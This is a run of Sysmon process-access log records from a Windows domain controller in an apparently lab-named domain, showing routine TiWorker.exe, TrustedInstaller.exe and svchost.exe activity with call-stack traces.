13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.273{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.242{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.242{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
